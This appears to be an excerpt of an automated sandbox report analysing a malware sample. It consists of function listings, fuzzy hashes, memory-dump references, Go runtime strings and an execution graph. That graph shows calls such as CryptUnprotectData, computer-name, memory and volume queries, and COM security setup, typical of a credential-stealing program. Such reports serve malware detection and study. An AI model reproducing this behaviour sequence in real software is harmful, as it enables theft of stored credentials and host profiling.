                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DialogParamVisibleWindow
                                                                                                                                                                          • String ID: GETPASSWORD1
                                                                                                                                                                          • API String ID: 3157717868-3292211884
                                                                                                                                                                          • Opcode ID: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
                                                                                                                                                                          • Instruction ID: c759e39f0235e01c38ede2ab9c991f42fc7ef131b49d1bd69416bb5ab6276af3
                                                                                                                                                                          • Opcode Fuzzy Hash: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
                                                                                                                                                                          • Instruction Fuzzy Hash: E5315025B0D6C2A9EA11AF26AC641BABB60FF49B84FC80076D98D07756CF2DE444C370
                                                                                                                                                                          Function 00007FF70ED02014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileHandleType
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 3000768030-2766056989
                                                                                                                                                                          • Opcode ID: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                          • Instruction ID: e22ba67c98a58c1e5660ef45e92c2ec4f95958eb8fd90291091143104ba1aee9
                                                                                                                                                                          • Opcode Fuzzy Hash: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                          • Instruction Fuzzy Hash: AB21D522E09B8281EB609B249C98339A651EF45774FAC0336D6AE477E5CF3DD981C320
                                                                                                                                                                          Function 00007FF70ECF7848 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70ECF57EE), ref: 00007FF70ECF788C
                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70ECF57EE), ref: 00007FF70ECF78D2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                          • Opcode ID: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                          • Instruction ID: 9c5fe7e9648abc1819b089b964fbf59e414f7803d859e74b452aaf920a3d1c9c
                                                                                                                                                                          • Opcode Fuzzy Hash: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B115E32A18B8592EB249F15F84026AB7A1FF88B88F584232EF8D17758DF3DD551CB00
                                                                                                                                                                          Function 00007FF70ECDA83C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindHandleModuleResource
                                                                                                                                                                          • String ID: RTL
                                                                                                                                                                          • API String ID: 3537982541-834975271
                                                                                                                                                                          • Opcode ID: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                          • Instruction ID: 50f45de7625db5ef3340614513294989abefce5e91a6bc9e415bdd5a8c2bb51f
                                                                                                                                                                          • Opcode Fuzzy Hash: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                          • Instruction Fuzzy Hash: E3D017A1F0D70782FF296B63AC4837556509F1AB41F8C0039C82D47790EF6E91988764

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 009BA2B0 Relevance: 11.4, Strings: 9, Instructions: 182COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerohttp: putIdleConn: connection is in bad stateinvalid request :path %q from URL.Opaque = %qhttp: multipart handled by ParseMul, xrefs: 009BA556
                                                                                                                                                                          • %, xrefs: 009BA5EE
                                                                                                                                                                          • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 009BA4FB
                                                                                                                                                                          • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!http: invalid byte %q in Cookie.Valueunexpected CONTINUATION for stream %dh, xrefs: 009BA5E5
                                                                                                                                                                          • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchout of range%!(BADWIDTH)Cookie.Valuecontent-typemax-forwardshttp2deb, xrefs: 009BA4D4
                                                                                                                                                                          • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerohttp: putIdleConn: connection is in bad stateinvalid request :path %q from URL.O, xrefs: 009BA5B1
                                                                                                                                                                          • ) @s -> Pn=][}]i)> +%!)(tvrRuUeEaAlLsS01bBoOxX+-nNiIfFpP; h2te80]:%T">OK])//":\t\r\n\"ip53._25\a\f[] %-ONWSLlLtLuMnCcCfCoCsLmLoMcMeNdNlNoPcPdPePfPiPoPsScSkSmSoZlZpZsYi=#OUCNST"iv-- ToA4V1V6V2V3V5A3*.}}MX0b0x0X0o%sV7/.v7v6,go==!=no%%jsorgegtleltne, xrefs: 009BA4B9
                                                                                                                                                                          • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerhttp2: aborting request body writehttp: persistConn.readLoop exitinghttp: read on closed r, xrefs: 009BA52F
                                                                                                                                                                          • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w, xrefs: 009BA58A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000001.00000002.1878419638.0000000000981000.00000020.00000001.01000000.00000009.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                          • Associated: 00000001.00000002.1878406241.0000000000980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1878934216.0000000001166000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1878934216.00000000013F3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879422155.0000000001968000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879436486.000000000196A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879449636.000000000196E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879462623.000000000196F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879475252.0000000001970000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879488305.0000000001973000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879501201.0000000001974000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879530337.00000000019B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879545453.00000000019C0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879559240.00000000019C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879572179.00000000019C2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879584442.00000000019C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879598425.00000000019C6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019C8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019D1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879669718.00000000019FB000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879682459.00000000019FC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879682459.0000000001A65000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_1_2_980000_Imperial_Delay.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: %$) @s -> Pn=][}]i)> +%!)(tvrRuUeEaAlLsS01bBoOxX+-nNiIfFpP; h2te80]:%T">OK])//":\t\r\n\"ip53._25\a\f[] %-ONWSLlLtLuMnCcCfCoCsLmLoMcMeNdNlNoPcPdPePfPiPoPsScSkSmSoZlZpZsYi=#OUCNST"iv-- ToA4V1V6V2V3V5A3*.}}MX0b0x0X0o%sV7/.v7v6,go==!=no%%jsorgegtleltne$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerhttp2: aborting request body writehttp: persistConn.readLoop exitinghttp: read on closed r$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchout of range%!(BADWIDTH)Cookie.Valuecontent-typemax-forwardshttp2deb$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerohttp: putIdleConn: connection is in bad stateinvalid request :path %q from URL.O$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!http: invalid byte %q in Cookie.Valueunexpected CONTINUATION for stream %dh$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerohttp: putIdleConn: connection is in bad stateinvalid request :path %q from URL.Opaque = %qhttp: multipart handled by ParseMul$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
                                                                                                                                                                          • API String ID: 0-2464228840
                                                                                                                                                                          • Opcode ID: aff75ba3bf0c971c4c41da543a799e7275d212e99a772a1a48a18af560ad39e1
                                                                                                                                                                          • Instruction ID: d65f1fffce2f0da8cc4fe8ac86248758ac8ece9486461d054cff786cb21c97d3
                                                                                                                                                                          • Opcode Fuzzy Hash: aff75ba3bf0c971c4c41da543a799e7275d212e99a772a1a48a18af560ad39e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 0691EEB4509301DFD310EF68C695B9ABBE4BF88724F00892DE4988B352E7B5D949CF52
                                                                                                                                                                          Function 009CA970 Relevance: 6.3, Strings: 5, Instructions: 83COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          • releasep: invalid p statecheckdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartunexpected key value typeExpandEnvironmentStringsWno hex dat, xrefs: 009CAAA7
                                                                                                                                                                          • p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by %!(BADPREC)bad verb '%0123456789_http2serverhttp2cl, xrefs: 009CAA73
                                                                                                                                                                          • releasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptionfeature not supportedhttp: nil Request.URLUNKNOWN_FRAME_TYPE_%dframe_ping_has_streamRoundTrip failure: %vUnhandle, xrefs: 009CAABD
                                                                                                                                                                          • m->p= p->m=SCHED curg= ctxt: min= max= (...) base Format[]byte' for stringBasic CookiecookieexpectserverclosedmethodExpectPragma</a>.socks socks5CANCELGOAWAYPADDED, val numbernetdns.localreturn.onionip+netdomaingophertelnet390625uint16uint32uint64structch, xrefs: 009CAA27
                                                                                                                                                                          • releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchout of range%!(BADWIDTH)Cookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continuerecv_goaway_status code Multi-StatusNot ModifiedUnauthorizedI'm a te, xrefs: 009CAA05
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000001.00000002.1878419638.0000000000981000.00000020.00000001.01000000.00000009.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                          • Associated: 00000001.00000002.1878406241.0000000000980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1878934216.0000000001166000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1878934216.00000000013F3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879422155.0000000001968000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879436486.000000000196A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879449636.000000000196E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879462623.000000000196F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879475252.0000000001970000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879488305.0000000001973000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879501201.0000000001974000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879530337.00000000019B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879545453.00000000019C0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879559240.00000000019C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879572179.00000000019C2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879584442.00000000019C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879598425.00000000019C6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019C8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019D1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879669718.00000000019FB000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879682459.00000000019FC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879682459.0000000001A65000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_1_2_980000_Imperial_Delay.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: m->p= p->m=SCHED curg= ctxt: min= max= (...) base Format[]byte' for stringBasic CookiecookieexpectserverclosedmethodExpectPragma</a>.socks socks5CANCELGOAWAYPADDED, val numbernetdns.localreturn.onionip+netdomaingophertelnet390625uint16uint32uint64structch$ p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by %!(BADPREC)bad verb '%0123456789_http2serverhttp2cl$releasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptionfeature not supportedhttp: nil Request.URLUNKNOWN_FRAME_TYPE_%dframe_ping_has_streamRoundTrip failure: %vUnhandle$releasep: invalid p statecheckdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartunexpected key value typeExpandEnvironmentStringsWno hex dat$releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchout of range%!(BADWIDTH)Cookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continuerecv_goaway_status code Multi-StatusNot ModifiedUnauthorizedI'm a te
                                                                                                                                                                          • API String ID: 0-3151324080
                                                                                                                                                                          • Opcode ID: 294ec51f8d2b2a921d4f22f713c438d926fbd704749ce1b05c4096db3cc1186e
                                                                                                                                                                          • Instruction ID: 1dca18459467e9cc5d88ddda612ff35af16ac3544d5e503edb84efa45045e316
                                                                                                                                                                          • Opcode Fuzzy Hash: 294ec51f8d2b2a921d4f22f713c438d926fbd704749ce1b05c4096db3cc1186e
                                                                                                                                                                          • Instruction Fuzzy Hash: B94102B4508745DFE310EF28D295B5ABBE4BF88324F01896DE4888B312D774D884DB62

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:6.8%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:36.1%
                                                                                                                                                                          Total number of Nodes:252
                                                                                                                                                                          Total number of Limit Nodes:23
                                                                                                                                                                          execution_graph 19207 40d740 19210 40d74b 19207->19210 19208 40d952 ExitProcess 19209 40d91b 19211 40d924 GetCurrentThreadId GetInputState 19209->19211 19212 40d94d 19209->19212 19210->19208 19210->19209 19213 40d902 ShellExecuteW 19210->19213 19214 40d934 GetCurrentProcessId 19211->19214 19216 40d93a 19211->19216 19221 4441e0 19212->19221 19213->19209 19214->19216 19216->19212 19220 411740 CoInitialize 19216->19220 19224 445700 19221->19224 19223 4441e5 FreeLibrary 19223->19208 19225 445709 19224->19225 19225->19223 19226 4250c0 19227 4250d0 19226->19227 19232 447840 19227->19232 19229 425149 19230 425124 19230->19229 19236 427960 19230->19236 19233 447860 19232->19233 19234 4479ae 19233->19234 19239 4442c0 LdrInitializeThunk 19233->19239 19234->19230 19240 447690 19236->19240 19238 4279a4 19239->19234 19242 4476b0 19240->19242 19241 4477ee 19241->19238 19242->19241 19244 4442c0 LdrInitializeThunk 19242->19244 19244->19241 19245 447f40 19246 447f60 19245->19246 19248 447fbe 19246->19248 19253 4442c0 LdrInitializeThunk 19246->19253 19248->19248 19250 44821c 19248->19250 19252 4480ef 19248->19252 19254 4442c0 LdrInitializeThunk 19248->19254 19255 441240 19252->19255 19253->19248 19254->19252 19256 441258 RtlFreeHeap 19255->19256 19257 4412db 19255->19257 19256->19257 19257->19250 19259 43dac4 CoSetProxyBlanket 19461 411789 19466 43d8d0 19461->19466 19463 411793 19464 43d8d0 CoCreateInstance 19463->19464 19465 411b01 19464->19465 19468 43d930 19466->19468 19467 43d994 CoCreateInstance 19467->19467 19467->19468 19468->19467 19260 41f5cb 19262 41f5d0 19260->19262 19261 41f765 CryptUnprotectData 19263 41f78f 19261->19263 19262->19261 19263->19263 19264 444a4e 19265 444a80 19264->19265 19266 444ace 19265->19266 19270 4442c0 LdrInitializeThunk 19265->19270 19269 4442c0 LdrInitializeThunk 19266->19269 19269->19266 19270->19266 19271 44464f 19273 444560 19271->19273 19272 4446ae 19273->19272 19276 4442c0 LdrInitializeThunk 19273->19276 19275 444621 19276->19275 19281 40fdcc 19282 40fdd8 19281->19282 19283 40fddf 19281->19283 19283->19282 19283->19283 19285 444200 19283->19285 19286 444294 19285->19286 19287 444288 19285->19287 19288 444229 RtlReAllocateHeap 19285->19288 19289 44421b 19285->19289 19292 44427d 19285->19292 19291 441240 RtlFreeHeap 19286->19291 19290 441240 RtlFreeHeap 19287->19290 19288->19292 19289->19286 19289->19287 19289->19288 19289->19292 19290->19286 19291->19292 19292->19282 19294 4321cc 19295 4321e3 19294->19295 19300 4327dc 19295->19300 19311 43d530 19295->19311 19297 432c0b FreeLibrary 19319 446c90 19297->19319 19300->19297 19300->19300 19302 432c80 GetComputerNameExA 19304 432d40 19302->19304 19303 433350 19304->19303 19305 433424 GetPhysicallyInstalledSystemMemory 19304->19305 19307 433448 19305->19307 19306 433921 19310 43386e 19307->19310 19321 4442c0 LdrInitializeThunk 19307->19321 19309 43408b FreeLibrary 19310->19306 19310->19309 19310->19310 19312 43d53e 19311->19312 19315 43d5ea 19312->19315 19323 4442c0 LdrInitializeThunk 19312->19323 19314 43d66f 19314->19300 19315->19314 19317 43d71e 19315->19317 19322 4442c0 LdrInitializeThunk 19315->19322 19317->19314 19324 4442c0 LdrInitializeThunk 19317->19324 19320 432c2c GetComputerNameExA 19319->19320 19320->19302 19321->19310 19322->19315 19323->19312 19324->19317 19469 44448b 19470 4444a0 19469->19470 19471 4444ee 19470->19471 19475 4442c0 LdrInitializeThunk 19470->19475 19476 4442c0 LdrInitializeThunk 19471->19476 19474 444dd4 19475->19471 19476->19474 19325 4188d1 19326 41890d 19325->19326 19329 41ec80 19326->19329 19328 41892a 19330 41ec93 19329->19330 19331 447690 LdrInitializeThunk 19330->19331 19332 41ee1d 19331->19332 19333 41ee3f 19332->19333 19335 41f015 19332->19335 19339 41f0fe 19332->19339 19341 41ee7c 19332->19341 19350 447a00 19332->19350 19333->19335 19333->19339 19333->19341 19344 447ae0 19333->19344 19335->19341 19354 4442c0 LdrInitializeThunk 19335->19354 19339->19339 19340 447690 LdrInitializeThunk 19339->19340 19342 41f22a 19340->19342 19341->19328 19341->19341 19343 447690 LdrInitializeThunk 19342->19343 19343->19342 19345 447b10 19344->19345 19348 447b7e 19345->19348 19355 4442c0 LdrInitializeThunk 19345->19355 19346 41ee6d 19346->19335 19346->19339 19346->19341 19346->19342 19348->19346 19356 4442c0 LdrInitializeThunk 19348->19356 19352 447a30 19350->19352 19351 447a8e 19351->19333 19352->19351 19357 4442c0 LdrInitializeThunk 19352->19357 19354->19341 19355->19348 19356->19346 19357->19351 19358 4411d2 19359 441221 RtlAllocateHeap 19358->19359 19360 4411d9 19358->19360 19360->19359 19482 43de1a 19483 43e02a 19482->19483 19484 43de6e VariantInit 19482->19484 19485 43de2d 19482->19485 19486 43e034 SysFreeString SysFreeString 19482->19486 19487 43e019 VariantClear 19482->19487 19492 43ded0 19482->19492 19498 43e0a4 19482->19498 19499 43e16b 19482->19499 19483->19486 19484->19492 19485->19483 19485->19484 19485->19487 19485->19492 19485->19498 19485->19499 19490 43e053 SysFreeString 19486->19490 19487->19483 19488 43e296 19494 441240 RtlFreeHeap 19488->19494 19489 4416a0 LdrInitializeThunk 19491 43e24e 19489->19491 19495 43e064 19490->19495 19491->19488 19491->19489 19493 441770 LdrInitializeThunk 19491->19493 19496 441540 LdrInitializeThunk 19491->19496 19491->19499 19492->19487 19492->19488 19492->19491 19492->19498 19492->19499 19493->19491 19500 43e29c 19494->19500 19497 43e07c GetVolumeInformationW 19495->19497 19496->19491 19497->19488 19497->19491 19497->19498 19497->19499 19498->19488 19498->19491 19498->19499 19504 4442c0 LdrInitializeThunk 19498->19504 19500->19499 19503 4442c0 LdrInitializeThunk 19500->19503 19503->19499 19504->19491 19361 411761 CoInitializeSecurity 19362 40f6e0 19365 40f720 19362->19365 19363 40fa64 19364 441240 RtlFreeHeap 19364->19363 19365->19363 19365->19364 19365->19365 19505 42d020 19506 42d040 19505->19506 19510 42d07e 19506->19510 19513 4442c0 LdrInitializeThunk 19506->19513 19507 42d40b 19509 441240 RtlFreeHeap 19509->19507 19510->19507 19512 42d10e 19510->19512 19514 4442c0 LdrInitializeThunk 19510->19514 19512->19509 19513->19510 19514->19512 19515 4488a0 19516 4488b1 19515->19516 19518 44896e 19516->19518 19523 4442c0 LdrInitializeThunk 19516->19523 19520 448b4a 19518->19520 19522 448a8e 19518->19522 19524 4442c0 LdrInitializeThunk 19518->19524 19519 441240 RtlFreeHeap 19519->19520 19522->19519 19523->19518 19524->19522 19366 4369e8 19369 41e8c0 19366->19369 19368 4369ed CoSetProxyBlanket 19369->19368 